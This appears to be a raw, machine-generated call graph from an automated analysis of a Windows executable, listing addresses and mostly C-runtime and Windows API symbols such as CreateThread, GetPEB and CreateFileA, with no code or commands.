9052->9053 9054 37bacf 9052->9054 9055 37b9f7 9053->9055 9056 37b0cb __freea 14 API calls 9053->9056 9054->9031 9057 37ba09 9055->9057 9059 37b0cb __freea 14 API calls 9055->9059 9056->9055 9058 37ba1b 9057->9058 9060 37b0cb __freea 14 API calls 9057->9060 9061 37ba2d 9058->9061 9062 37b0cb __freea 14 API calls 9058->9062 9059->9057 9060->9058 9063 37ba3f 9061->9063 9064 37b0cb __freea 14 API calls 9061->9064 9062->9061 9065 37ba51 9063->9065 9067 37b0cb __freea 14 API calls 9063->9067 9064->9063 9066 37ba63 9065->9066 9068 37b0cb __freea 14 API calls 9065->9068 9069 37ba75 9066->9069 9070 37b0cb __freea 14 API calls 9066->9070 9067->9065 9068->9066 9071 37ba87 9069->9071 9072 37b0cb __freea 14 API calls 9069->9072 9070->9069 9073 37ba99 9071->9073 9075 37b0cb __freea 14 API calls 9071->9075 9072->9071 9074 37baab 9073->9074 9076 37b0cb __freea 14 API calls 9073->9076 9077 37babd 9074->9077 9078 37b0cb __freea 14 API calls 9074->9078 9075->9073 9076->9074 9077->9054 9079 37b0cb __freea 14 API calls 9077->9079 9078->9077 9079->9054 9081 37bae0 9080->9081 9082 37bb38 9080->9082 9083 37baf0 9081->9083 9084 37b0cb __freea 14 API calls 9081->9084 9082->9051 9085 37bb02 9083->9085 9086 37b0cb __freea 14 API calls 9083->9086 9084->9083 9087 37bb14 9085->9087 9089 37b0cb __freea 14 API calls 9085->9089 9086->9085 9088 37bb26 9087->9088 9090 37b0cb __freea 14 API calls 9087->9090 9088->9082 9091 37b0cb __freea 14 API calls 9088->9091 9089->9087 9090->9088 9091->9082 9093 37c174 9092->9093 9094 37c155 9092->9094 9093->9036 9094->9093 9095 37bb3c _unexpected 14 API calls 9094->9095 9096 37c16e 9095->9096 9097 37b0cb __freea 14 API calls 9096->9097 9097->9093 9098->9023 9149 37b43f 9099->9149 9106 37b1ef ___scrt_is_nonwritable_in_current_image 9102->9106 9103 37a15b __dosmaperr 14 API calls 9112 37b220 CallUnexpected 9103->9112 9104 37b23f 9105 37b757 __strnicoll 14 API calls 9104->9105 9108 37b244 9105->9108 9106->9103 9106->9104 9107 37b251 CallUnexpected 9106->9107 9106->9112 9109 37b287 CallUnexpected 9107->9109 9163 378161 EnterCriticalSection 9107->9163 9160 377d69 9108->9160 9114 37b2c4 9109->9114 9115 37b3c1 9109->9115 9125 37b2f2 9109->9125 9112->9104 9112->9107 9128 37b229 9112->9128 9114->9125 9164 37a00a GetLastError 9114->9164 9117 37b3cc 9115->9117 9195 378178 LeaveCriticalSection 9115->9195 9118 376eeb CallUnexpected 21 API calls 9117->9118 9120 37b3d4 9118->9120 9122 37a00a _unexpected 48 API calls 9126 37b347 9122->9126 9124 37a00a _unexpected 48 API calls 9124->9125 9191 37b36d 9125->9191 9127 37a00a _unexpected 48 API calls 9126->9127 9126->9128 9127->9128 9128->8935 9130 377de6 CallUnexpected std::bad_exception::bad_exception 9129->9130 9131 377e12 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9130->9131 9132 377ee3 CallUnexpected 9131->9132 9218 374241 9132->9218 9134 377f01 9134->8935 9136 378846 GetLastError 9135->9136 9137 378843 9135->9137 9226 37db9e 9136->9226 9137->8935 9139 37887a 9141 3788c0 SetLastError 9139->9141 9141->8935 9142 37dbd9 ___vcrt_FlsSetValue 6 API calls 9143 378874 _unexpected 9142->9143 9143->9139 9144 37889c 9143->9144 9145 37dbd9 ___vcrt_FlsSetValue 6 API calls 9143->9145 9146 37dbd9 ___vcrt_FlsSetValue 6 API calls 9144->9146 9147 3788b0 9144->9147 9145->9144 9146->9147 9231 3783ac 9147->9231 9150 37b44b ___scrt_is_nonwritable_in_current_image 9149->9150 9155 378161 EnterCriticalSection 9150->9155 9152 37b459 9156 37b49b 9152->9156 9155->9152 9159 378178 LeaveCriticalSection 9156->9159 9158 37b1e1 9158->8935 9159->9158 9196 37809f 9160->9196 9163->9109 9165 37a020 9164->9165 9168 37a026 9164->9168 9167 379b90 _unexpected 6 API calls 9165->9167 9166 379bcf _unexpected 6 API calls 9169 37a042 9166->9169 9167->9168 9168->9166 9188 37a02a SetLastError 9168->9188 9171 37b807 _unexpected 14 API calls 9169->9171 9169->9188 9172 37a057 9171->9172 9175 37a070 9172->9175 9176 37a05f 9172->9176 9173 37a0bf 9177 37835d CallUnexpected 46 API calls 9173->9177 9174 37a0ba 9174->9124 9180 379bcf _unexpected 6 API calls 9175->9180 9179 379bcf _unexpected 6 API calls 9176->9179 9178 37a0c4 9177->9178 9181 37a06d 9179->9181 9182 37a07c 9180->9182 9186 37b0cb __freea 14 API calls 9181->9186 9183 37a097 9182->9183 9184 37a080 9182->9184 9187 37a31c _unexpected 14 API calls 9183->9187 9185 379bcf _unexpected 6 API calls 9184->9185 9185->9181 9186->9188 9189 37a0a2 9187->9189 9188->9173 9188->9174 9190 37b0cb __freea 14 API calls 9189->9190 9190->9188 9192 37b371 9191->9192 9193 37b339 9191->9193 9217 378178 LeaveCriticalSection 9192->9217 9193->9122 9193->9126 9193->9128 9195->9117 9197 3780b1 __strnicoll 9196->9197 9202 377f12 9197->9202 9203 377f22 9202->9203 9205 377f29 9202->9205 9204 378030 __strnicoll 16 API calls 9203->9204 9204->9205 9206 378076 __strnicoll GetLastError SetLastError 9205->9206 9209 377f37 9205->9209 9207 377f5e 9206->9207 9208 377d96 __strnicoll 11 API calls 9207->9208 9207->9209 9210 377f8e 9208->9210 9211 377fd7 9209->9211 9212 377fe3 9211->9212 9213 378013 __strnicoll 48 API calls 9212->9213 9214 377ffa 9212->9214 9213->9214 9215 377d75 9214->9215 9216 378013 __strnicoll 48 API calls 9214->9216 9215->9128 9216->9215 9217->9193 9219 37424a IsProcessorFeaturePresent 9218->9219 9220 374249 9218->9220 9222 3749f4 9219->9222 9220->9134 9225 374ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9222->9225 9224 374ad7 9224->9134 9225->9224 9227 37dca9 ___vcrt_FlsFree 5 API calls 9226->9227 9228 37dbb8 9227->9228 9229 37dbd0 TlsGetValue 9228->9229 9230 37885b 9228->9230 9229->9230 9230->9139 9230->9141 9230->9142 9232 37b0cb __freea 14 API calls 9231->9232 9233 3783c4 9232->9233 9233->9139 9267 37a8c8 9234->9267 9237 37ab82 9239 37ab99 9237->9239 9240 37ab87 GetACP 9237->9240 9238 37ab70 GetOEMCP 9238->9239 9239->8897 9241 37bc45 9239->9241 9240->9239 9242 37bc83 9241->9242 9247 37bc53 _unexpected 9241->9247 9244 37b757 __strnicoll 14 API calls 9242->9244 9243 37bc6e RtlAllocateHeap 9245 37ad17 9243->9245 9243->9247 9244->9245 9245->8893 9245->8894 9246 377207 _unexpected 2 API calls 9246->9247 9247->9242 9247->9243 9247->9246 9249 37ab4f 50 API calls 9248->9249 9251 37a96a 9249->9251 9250 37aa6f 9252 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9250->9252 9251->9250 9253 37a9a7 IsValidCodePage 9251->9253 9258 37a9c2 std::bad_exception::bad_exception 9251->9258 9254 37ab4d 9252->9254 9253->9250 9255 37a9b9 9253->9255 9254->8899 9254->8904 9256 37a9e2 GetCPInfo 9255->9256 9255->9258 9256->9250 9256->9258 9307 37aed9 9258->9307 9260 37b08a ___scrt_is_nonwritable_in_current_image 9259->9260 9384 378161 EnterCriticalSection 9260->9384 9262 37b094 9385 37ae18 9262->9385 9268 37a8e6 9267->9268 9274 37a8df 9267->9274 9269 37a00a _unexpected 48 API calls 9268->9269 9268->9274 9270 37a907 9269->9270 9275 37d95d 9270->9275 9274->9237 9274->9238 9276 37d970 9275->9276 9278 37a91d 9275->9278 9276->9278 9283 37c179 9276->9283 9279 37d98a 9278->9279 9280 37d9b2 9279->9280 9281 37d99d 9279->9281 9280->9274 9281->9280 9304 37a863 9281->9304 9284 37c185 ___scrt_is_nonwritable_in_current_image 9283->9284 9285 37a00a _unexpected 48 API calls 9284->9285 9286 37c18e 9285->9286 9287 37c1d4 9286->9287 9296 378161 EnterCriticalSection 9286->9296 9287->9278 9289 37c1ac 9297 37c1fa 9289->9297 9294 37835d CallUnexpected 48 API calls 9295 37c1f9 9294->9295 9296->9289 9298 37c208 _unexpected 9297->9298 9300 37c1bd 9297->9300 9299 37bfae _unexpected 14 API calls 9298->9299 9298->9300 9299->9300 9301 37c1d9 9300->9301 9302 378178 CallUnexpected LeaveCriticalSection 9301->9302 9303 37c1d0 9302->9303 9303->9287 9303->9294 9305 37a00a _unexpected 48 API calls 9304->9305 9306 37a868 9305->9306 9306->9280 9308 37af01 GetCPInfo 9307->9308 9317 37afca 9307->9317 9313 37af19 9308->9313 9308->9317 9310 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9311 37b07c 9310->9311 9311->9250 9318 37bced 9313->9318 9316 37ded4 52 API calls 9316->9317 9317->9310 9319 37a8c8 __strnicoll 48 API calls 9318->9319 9320 37bd0d 9319->9320 9338 37bdee 9320->9338 9322 37bdc9 9325 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9322->9325 9323 37bdc1 9341 37bccd 9323->9341 9324 37bd3a 9324->9322 9324->9323 9327 37bc45 __strnicoll 15 API calls 9324->9327 9329 37bd5f __alloca_probe_16 std::bad_exception::bad_exception 9324->9329 9328 37af81 9325->9328 9327->9329 9333 37ded4 9328->9333 9329->9323 9330 37bdee __strnicoll MultiByteToWideChar 9329->9330 9331 37bda8 9330->9331 9331->9323 9332 37bdaf GetStringTypeW 9331->9332 9332->9323 9334 37a8c8 __strnicoll 48 API calls 9333->9334 9335 37dee7 9334->9335 9347 37df1d 9335->9347 9345 37be18 9338->9345 9342 37bcd9 9341->9342 9344 37bcea 9341->9344 9343 37b0cb __freea 14 API calls 9342->9343 9342->9344 9343->9344 9344->9322 9346 37be0a MultiByteToWideChar 9345->9346 9346->9324 9348 37df38 __strnicoll 9347->9348 9349 37bdee __strnicoll MultiByteToWideChar 9348->9349 9352 37df7c 9349->9352 9350 37e0f7 9351 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9350->9351 9353 37afa2 9351->9353 9352->9350 9354 37bc45 __strnicoll 15 API calls 9352->9354 9356 37dfa2 __alloca_probe_16 9352->9356 9367 37e04a 9352->9367 9353->9316 9354->9356 9355 37bccd __freea 14 API calls 9355->9350 9357 37bdee __strnicoll MultiByteToWideChar 9356->9357 9356->9367 9358 37dfeb 9357->9358 9358->9367 9375 379c5c 9358->9375 9361 37e021 9364 379c5c 6 API calls 9361->9364 9361->9367 9362 37e059 9363 37e0e2 9362->9363 9365 37bc45 __strnicoll 15 API calls 9362->9365 9368 37e06b __alloca_probe_16 9362->9368 9366 37bccd __freea 14 API calls 9363->9366 9364->9367 9365->9368 9366->9367 9367->9355 9368->9363 9369 379c5c 6 API calls 9368->9369 9370 37e0ae 9369->9370 9370->9363 9381 37d131 9370->9381 9372 37e0c8 9372->9363 9373 37e0d1 9372->9373 9374 37bccd __freea 14 API calls 9373->9374 9374->9367 9376 379f57 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9375->9376 9377 379c67 9376->9377 9378 379cb9 __strnicoll 5 API calls 9377->9378 9380 379c6d 9377->9380 9379 379cad LCMapStringW 9378->9379 9379->9380 9380->9361 9380->9362 9380->9367 9383 37d144 ___scrt_uninitialize_crt 9381->9383 9382 37d182 WideCharToMultiByte 9382->9372 9383->9382 9384->9262 9395 37a7e2 9385->9395 9387 37ae3a 9388 37a7e2 48 API calls 9387->9388 9389 37ae59 9388->9389 9390 37ae80 9389->9390 9391 37b0cb __freea 14 API calls 9389->9391 9392 37b0bf 9390->9392 9391->9390 9409 378178 LeaveCriticalSection 9392->9409 9394 37b0ad 9394->8905 9396 37a7f3 9395->9396 9405 37a7ef CatchIt 9395->9405 9397 37a7fa 9396->9397 9400 37a80d std::bad_exception::bad_exception 9396->9400 9398 37b757 __strnicoll 14 API calls 9397->9398 9399 37a7ff 9398->9399 9401 377d69 __strnicoll 48 API calls 9399->9401 9402 37a844 9400->9402 9403 37a83b 9400->9403 9400->9405 9401->9405 9402->9405 9407 37b757 __strnicoll 14 API calls 9402->9407 9404 37b757 __strnicoll 14 API calls 9403->9404 9406 37a840 9404->9406 9405->9387 9408 377d69 __strnicoll 48 API calls 9406->9408 9407->9406 9408->9405 9409->9394 9411 3796c8 9410->9411 9412 3796ba 9410->9412 9413 37b757 __strnicoll 14 API calls 9411->9413 9412->9411 9414 3796e0 9412->9414 9418 3796d0 9413->9418 9416 3796da 9414->9416 9417 37b757 __strnicoll 14 API calls 9414->9417 9415 377d69 __strnicoll 48 API calls 9415->9416 9416->8854 9417->9418 9418->9415 9423 377b5d 9419->9423 9424 377b7a 9419->9424 9420 377b74 9422 37b0cb __freea 14 API calls 9420->9422 9421 37b0cb __freea 14 API calls 9421->9423 9422->9424 9423->9420 9423->9421 9424->8855 9426 377da2 9425->9426 9427 377dca CallUnexpected 8 API calls 9426->9427 9428 377db7 GetCurrentProcess TerminateProcess 9427->9428 9428->8861 9430 37d30f 9429->9430 9431 37d320 9430->9431 9434 37d333 ___from_strstr_to_strchr 9430->9434 9432 37b757 __strnicoll 14 API calls 9431->9432 9433 37d325 9432->9433 9433->8800 9435 37d54a 9434->9435 9436 37d353 9434->9436 9437 37b757 __strnicoll 14 API calls 9435->9437 9492 37d56f 9436->9492 9439 37d54f 9437->9439 9441 37b0cb __freea 14 API calls 9439->9441 9441->9433 9442 37d397 9478 37d383 9442->9478 9496 37d589 9442->9496 9443 37d399 9447 37b807 _unexpected 14 API calls 9443->9447 9443->9478 9445 37d375 9452 37d392 9445->9452 9453 37d37e 9445->9453 9449 37d3a7 9447->9449 9448 37b0cb __freea 14 API calls 9448->9433 9451 37b0cb __freea 14 API calls 9449->9451 9450 37d40c 9455 37b0cb __freea 14 API calls 9450->9455 9456 37d3b2 9451->9456 9454 37d56f 48 API calls 9452->9454 9457 37b757 __strnicoll 14 API calls 9453->9457 9454->9442 9463 37d414 9455->9463 9456->9442 9461 37b807 _unexpected 14 API calls 9456->9461 9456->9478 9457->9478 9458 37d457 9459 37d0c4 51 API calls 9458->9459 9458->9478 9460 37d485 9459->9460 9462 37b0cb __freea 14 API calls 9460->9462 9465 37d3ce 9461->9465 9468 37d441 9462->9468 9463->9468 9500 37d0c4 9463->9500 9464 37d53f 9466 37b0cb __freea 14 API calls 9464->9466 9469 37b0cb __freea 14 API calls 9465->9469 9466->9433 9468->9464 9468->9468 9472 37b807 _unexpected 14 API calls 9468->9472 9468->9478 9469->9442 9470 37d438 9471 37b0cb __freea 14 API calls 9470->9471 9471->9468 9473 37d4d0 9472->9473 9474 37d4e0 9473->9474 9475 37d4d8 9473->9475 9477 3796ac ___std_exception_copy 48 API calls 9474->9477 9476 37b0cb __freea 14 API calls 9475->9476 9476->9478 9479 37d4ec 9477->9479 9478->9448 9480 37d564 9479->9480 9481 37d4f3 9479->9481 9482 377d96 __strnicoll 11 API calls 9480->9482 9509 37f9bc 9481->9509 9484 37d56e 9482->9484 9486 37d51a 9489 37b757 __strnicoll 14 API calls 9486->9489 9487 37d539 9488 37b0cb __freea 14 API calls 9487->9488 9488->9464 9490 37d51f 9489->9490 9491 37b0cb __freea 14 API calls 9490->9491 9491->9478 9493 37d57c 9492->9493 9494 37d35e 9492->9494 9524 37d5de 9493->9524 9494->9442 9494->9443 9494->9445 9497 37d59f 9496->9497 9499 37d3fc 9496->9499 9497->9499 9539 37f8cb 9497->9539 9499->9450 9499->9458 9501 37d0d1 9500->9501 9502 37d0ec 9500->9502 9501->9502 9503 37d0dd 9501->9503 9504 37d0fb 9502->9504 9639 37f6f8 9502->9639 9505 37b757 __strnicoll 14 API calls 9503->9505 9646 37f72b 9504->9646 9508 37d0e2 std::bad_exception::bad_exception 9505->9508 9508->9470 9658 37c274 9509->9658 9514 37fa2f 9515 37fa3b 9514->9515 9517 37b0cb __freea 14 API calls 9514->9517 9518 37d514 9515->9518 9520 37b0cb __freea 14 API calls 9515->9520 9516 37c274 48 API calls 9519 37fa0c 9516->9519 9517->9515 9518->9486 9518->9487 9521 37c30c 17 API calls 9519->9521 9520->9518 9522 37fa19 9521->9522 9522->9514 9523 37fa23 SetEnvironmentVariableW 9522->9523 9523->9514 9525 37d5f1 9524->9525 9526 37d5ec 9524->9526 9527 37b807 _unexpected 14 API calls 9525->9527 9526->9494 9535 37d60e 9527->9535 9528 37d67c 9529 37835d CallUnexpected 48 API calls 9528->9529 9531 37d681 9529->9531 9530 37b0cb __freea 14 API calls 9530->9526 9532 377d96 __strnicoll 11 API calls 9531->9532 9533 37d68d 9532->9533 9534 37b807 _unexpected 14 API calls 9534->9535 9535->9528 9535->9531 9535->9534 9536 37b0cb __freea 14 API calls 9535->9536 9537 3796ac ___std_exception_copy 48 API calls 9535->9537 9538 37d66b 9535->9538 9536->9535 9537->9535 9538->9530 9540 37f8df 9539->9540 9541 37f8d9 9539->9541 9557 37f8f4 9540->9557 9544 380199 9541->9544 9545 3801e1 9541->9545 9547 38019f 9544->9547 9548 3801bc 9544->9548 9577 3801f7 9545->9577 9550 37b757 __strnicoll 14 API calls 9547->9550 9553 37b757 __strnicoll 14 API calls 9548->9553 9556 3801da 9548->9556 9549 3801af 9549->9497 9551 3801a4 9550->9551 9552 377d69 __strnicoll 48 API calls 9551->9552 9552->9549 9554 3801cb 9553->9554 9555 377d69 __strnicoll 48 API calls 9554->9555 9555->9549 9556->9497 9558 37a8c8 __strnicoll 48 API calls 9557->9558 9559 37f90a 9558->9559 9560 37f926 9559->9560 9561 37f93d 9559->9561 9573 37f8ef 9559->9573 9562 37b757 __strnicoll 14 API calls 9560->9562 9563 37f946 9561->9563 9564 37f958 9561->9564 9565 37f92b 9562->9565 9566 37b757 __strnicoll 14 API calls 9563->9566 9567 37f965 9564->9567 9568 37f978 9564->9568 9569 377d69 __strnicoll 48 API calls 9565->9569 9570 37f94b 9566->9570 9571 3801f7 __strnicoll 48 API calls 9567->9571 9595 3802c2 9568->9595 9569->9573 9574 377d69 __strnicoll 48 API calls 9570->9574 9571->9573 9573->9497 9574->9573 9576 37b757 __strnicoll 14 API calls 9576->9573 9578 380221 9577->9578 9579 380207 9577->9579 9581 380229 9578->9581 9582 380240 9578->9582 9580 37b757 __strnicoll 14 API calls 9579->9580 9583 38020c 9580->9583 9584 37b757 __strnicoll 14 API calls 9581->9584 9585 38024c 9582->9585 9586 380263 9582->9586 9587 377d69 __strnicoll 48 API calls 9583->9587 9588 38022e 9584->9588 9589 37b757 __strnicoll 14 API calls 9585->9589 9590 37a8c8 __strnicoll 48 API calls 9586->9590 9593 380217 9586->9593 9587->9593 9591 377d69 __strnicoll 48 API calls 9588->9591 9592 380251 9589->9592 9590->9593 9591->9593 9594 377d69 __strnicoll 48 API calls 9592->9594 9593->9549 9594->9593 9596 37a8c8 __strnicoll 48 API calls 9595->9596 9597 3802d5 9596->9597 9600 380308 9597->9600 9606 38033c __strnicoll 9600->9606 9601 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9602 37f98e 9601->9602 9602->9573 9602->9576 9603 3803bc 9605 37bdee __strnicoll MultiByteToWideChar 9603->9605 9612 3803c0 9603->9612 9604 3805a0 9609 380442 9605->9609 9606->9603 9606->9604 9607 3803a9 GetCPInfo 9606->9607 9606->9612 9607->9603 9607->9612 9608 380594 9610 37bccd __freea 14 API calls 9608->9610 9609->9608 9611 37bc45 __strnicoll 15 API calls 9609->9611 9609->9612 9613 380469 __alloca_probe_16 9609->9613 9610->9612 9611->9613 9612->9601 9612->9604 9613->9608 9614 37bdee __strnicoll MultiByteToWideChar 9613->9614 9615 3804b5 9614->9615 9615->9608 9616 37bdee __strnicoll MultiByteToWideChar 9615->9616 9617 3804d1 9616->9617 9617->9608 9618 3804df 9617->9618 9619 380542 9618->9619 9621 37bc45 __strnicoll 15 API calls 9618->9621 9624 3804f8 __alloca_probe_16 9618->9624 9620 37bccd __freea 14 API calls 9619->9620 9622 380548 9620->9622 9621->9624 9623 37bccd __freea 14 API calls 9622->9623 9623->9612 9624->9619 9625 37bdee __strnicoll MultiByteToWideChar 9624->9625 9626 38053b 9625->9626 9626->9619 9627 380564 9626->9627 9633 379ab5 9627->9633 9630 37bccd __freea 14 API calls 9631 380584 9630->9631 9632 37bccd __freea 14 API calls 9631->9632 9632->9612 9634 379f3d __strnicoll 5 API calls 9633->9634 9635 379ac0 9634->9635 9636 379cb9 __strnicoll 5 API calls 9635->9636 9638 379ac6 9635->9638 9637 379b06 CompareStringW 9636->9637 9637->9638 9638->9630 9640 37f703 9639->9640 9641 37f718 HeapSize 9639->9641 9642 37b757 __strnicoll 14 API calls 9640->9642 9641->9504 9643 37f708 9642->9643 9644 377d69 __strnicoll 48 API calls 9643->9644 9645 37f713 9644->9645 9645->9504 9647 37f743 9646->9647 9648 37f738 9646->9648 9650 37f74b 9647->9650 9656 37f754 _unexpected 9647->9656 9649 37bc45 __strnicoll 15 API calls 9648->9649 9654 37f740 9649->9654 9651 37b0cb __freea 14 API calls 9650->9651 9651->9654 9652 37f77e HeapReAlloc 9652->9654 9652->9656 9653 37f759 9655 37b757 __strnicoll 14 API calls 9653->9655 9654->9508 9655->9654 9656->9652 9656->9653 9657 377207 _unexpected 2 API calls 9656->9657 9657->9656 9659 37a8c8 __strnicoll 48 API calls 9658->9659 9660 37c286 9659->9660 9661 37c298 9660->9661 9666 379a96 9660->9666 9663 37c30c 9661->9663 9672 37c4e2 9663->9672 9669 379f23 9666->9669 9670 379e9e _unexpected 5 API calls 9669->9670 9671 379a9e 9670->9671 9671->9661 9673 37c4f0 9672->9673 9674 37c50a 9672->9674 9690 37c2f2 9673->9690 9675 37c511 9674->9675 9676 37c530 9674->9676 9689 37c324 9675->9689 9694 37c2b3 9675->9694 9678 37bdee __strnicoll MultiByteToWideChar 9676->9678 9680 37c53f 9678->9680 9681 37c546 GetLastError 9680->9681 9683 37c56c 9680->9683 9686 37c2b3 15 API calls 9680->9686 9699 37b77d 9681->9699 9684 37bdee __strnicoll MultiByteToWideChar 9683->9684 9683->9689 9687 37c583 9684->9687 9686->9683 9687->9681 9687->9689 9688 37b757 __strnicoll 14 API calls 9688->9689 9689->9514 9689->9516 9691 37c2fd 9690->9691 9692 37c305 9690->9692 9693 37b0cb __freea 14 API calls 9691->9693 9692->9689 9693->9692 9695 37c2f2 14 API calls 9694->9695 9696 37c2c1 9695->9696 9704 37c255 9696->9704 9707 37b76a 9699->9707 9701 37b788 __dosmaperr 9702 37b757 __strnicoll 14 API calls 9701->9702 9703 37b79b 9702->9703 9703->9688 9705 37bc45 __strnicoll 15 API calls 9704->9705 9706 37c262 9705->9706 9706->9689 9708 37a15b __dosmaperr 14 API calls 9707->9708 9709 37b76f 9708->9709 9709->9701 9711 36ce50 std::_Throw_Cpp_error 9710->9711 9729 373b60 9711->9729 9714 36ce70 9722 36ce93 9714->9722 9715 36d449 9716 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9715->9716 9717 36cdd5 CreateEllipticRgn 9716->9717 9723 36d4a0 9717->9723 9718 36cf87 GetCurrentThreadId 9718->9722 9719 37441d std::_Throw_Cpp_error 52 API calls 9719->9718 9721 37441d 52 API calls std::_Throw_Cpp_error 9721->9722 9722->9715 9722->9718 9722->9719 9722->9721 10086 374952 WaitForSingleObjectEx 9722->10086 9724 36d4c0 9723->9724 9726 36d528 9724->9726 10091 37846b 9724->10091 9727 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9726->9727 9728 36ce14 9727->9728 9728->8664 9730 373b8b std::_Throw_Cpp_error 9729->9730 9743 373cc0 9730->9743 9732 373b9a 9752 376ce6 9732->9752 9734 373bea 9735 373c84 9734->9735 9737 373c9a 9734->9737 9767 373de0 9734->9767 9771 37441d 9735->9771 9777 373e30 9737->9777 9740 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9742 36cdc7 9740->9742 9742->9714 9783 3741c6 9743->9783 9745 373cef std::_Throw_Cpp_error 9797 373f00 9745->9797 9750 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9751 373d32 9750->9751 9751->9732 9753 376d07 9752->9753 9754 376cf3 9752->9754 9821 376d77 9753->9821 9755 37b757 __strnicoll 14 API calls 9754->9755 9757 376cf8 9755->9757 9759 377d69 __strnicoll 48 API calls 9757->9759 9761 376d03 9759->9761 9760 376d1c CreateThread 9762 376d47 9760->9762 9763 376d3b GetLastError 9760->9763 9838 376e00 9760->9838 9761->9734 9830 376dc7 9762->9830 9765 37b77d __dosmaperr 14 API calls 9763->9765 9765->9762 9768 373e0c 9767->9768 9769 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9768->9769 9770 373e19 9769->9770 9770->9734 9772 374433 std::_Throw_Cpp_error 9771->9772 9978 37467d 9772->9978 9779 373e58 std::_Throw_Cpp_error 9777->9779 9778 373ee3 9780 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9778->9780 9779->9778 10082 3740f0 9779->10082 9781 373ca2 9780->9781 9781->9740 9786 3741cb 9783->9786 9785 3741e5 9785->9745 9786->9785 9787 377207 _unexpected 2 API calls 9786->9787 9789 3741e7 std::_Throw_Cpp_error 9786->9789 9806 3783c7 9786->9806 9787->9786 9788 3749c1 std::_Throw_Cpp_error 9790 3759fc std::_Throw_Cpp_error RaiseException 9788->9790 9789->9788 9813 3759fc 9789->9813 9791 3749de IsProcessorFeaturePresent 9790->9791 9794 3749f4 9791->9794 9816 374ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9794->9816 9796 374ad7 9796->9745 9817 373fb0 9797->9817 9800 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9801 373d0e 9800->9801 9802 373f60 9801->9802 9803 373f95 9802->9803 9804 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9803->9804 9805 373d22 9804->9805 9805->9750 9812 37bc45 _unexpected 9806->9812 9807 37bc83 9809 37b757 __strnicoll 14 API calls 9807->9809 9808 37bc6e RtlAllocateHeap 9810 37bc81 9808->9810 9808->9812 9809->9810 9810->9786 9811 377207 _unexpected 2 API calls 9811->9812 9812->9807 9812->9808 9812->9811 9814 375a16 9813->9814 9815 375a43 RaiseException 9813->9815 9814->9815 9815->9788 9816->9796 9818 373fe2 std::_Throw_Cpp_error 9817->9818 9819 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9818->9819 9820 373f36 9819->9820 9820->9800 9822 37b807 _unexpected 14 API calls 9821->9822 9823 376d88 9822->9823 9824 37b0cb __freea 14 API calls 9823->9824 9825 376d95 9824->9825 9826 376d9c GetModuleHandleExW 9825->9826 9827 376db9 9825->9827 9826->9827 9828 376dc7 16 API calls 9827->9828 9829 376d13 9828->9829 9829->9760 9829->9762 9831 376dd3 9830->9831 9832 376d52 9830->9832 9833 376de2 9831->9833 9834 376dd9 CloseHandle 9831->9834 9832->9734 9835 376df1 9833->9835 9836 376de8 FreeLibrary 9833->9836 9834->9833 9837 37b0cb __freea 14 API calls 9835->9837 9836->9835 9837->9832 9839 376e0c ___scrt_is_nonwritable_in_current_image 9838->9839 9840 376e13 GetLastError ExitThread 9839->9840 9841 376e20 9839->9841 9842 37a00a _unexpected 48 API calls 9841->9842 9843 376e25 9842->9843 9854 37b976 9843->9854 9846 376e3c 9858 373d40 9846->9858 9855 376e30 9854->9855 9856 37b986 CallUnexpected 9854->9856 9855->9846 9869 379cea 9855->9869 9856->9855 9875 379d93 9856->9875 9859 373f60 5 API calls 9858->9859 9860 373d6d std::_Throw_Cpp_error 9859->9860 9878 3740a0 9860->9878 9865 373e30 5 API calls 9866 373da6 9865->9866 9867 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9866->9867 9868 373db5 9867->9868 9872 376d69 9868->9872 9870 379e9e _unexpected 5 API calls 9869->9870 9871 379d06 9870->9871 9871->9846 9966 376e7e 9872->9966 9876 379e9e _unexpected 5 API calls 9875->9876 9877 379daf 9876->9877 9877->9855 9886 36cd10 GetPEB 9878->9886 9881 3748cb GetCurrentThreadId 9958 374c86 9881->9958 9885 3748e4 __Mtx_unlock __Cnd_broadcast 9961 374c92 9885->9961 9893 3784a7 9886->9893 9891 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9892 36cd82 9891->9892 9892->9881 9894 3784ba __strnicoll 9893->9894 9908 378537 9894->9908 9897 377fd7 __strnicoll 48 API calls 9898 36cd62 9897->9898 9899 36c860 9898->9899 9906 36c890 9899->9906 9901 36cced 9902 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9901->9902 9904 36ccf9 9902->9904 9904->9891 9906->9901 9932 36beb0 CreateFileA 9906->9932 9942 3686c0 9906->9942 9949 361000 9906->9949 9955 368ea0 9906->9955 9909 378567 9908->9909 9910 378576 9909->9910 9911 378594 9909->9911 9922 37856b 9909->9922 9912 377f12 __strnicoll 29 API calls 9910->9912 9913 3785a1 9911->9913 9915 3784de ___scrt_uninitialize_crt 48 API calls 9911->9915 9912->9922 9916 3785bb 9913->9916 9917 3785d9 9913->9917 9914 374241 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9920 3784cc 9914->9920 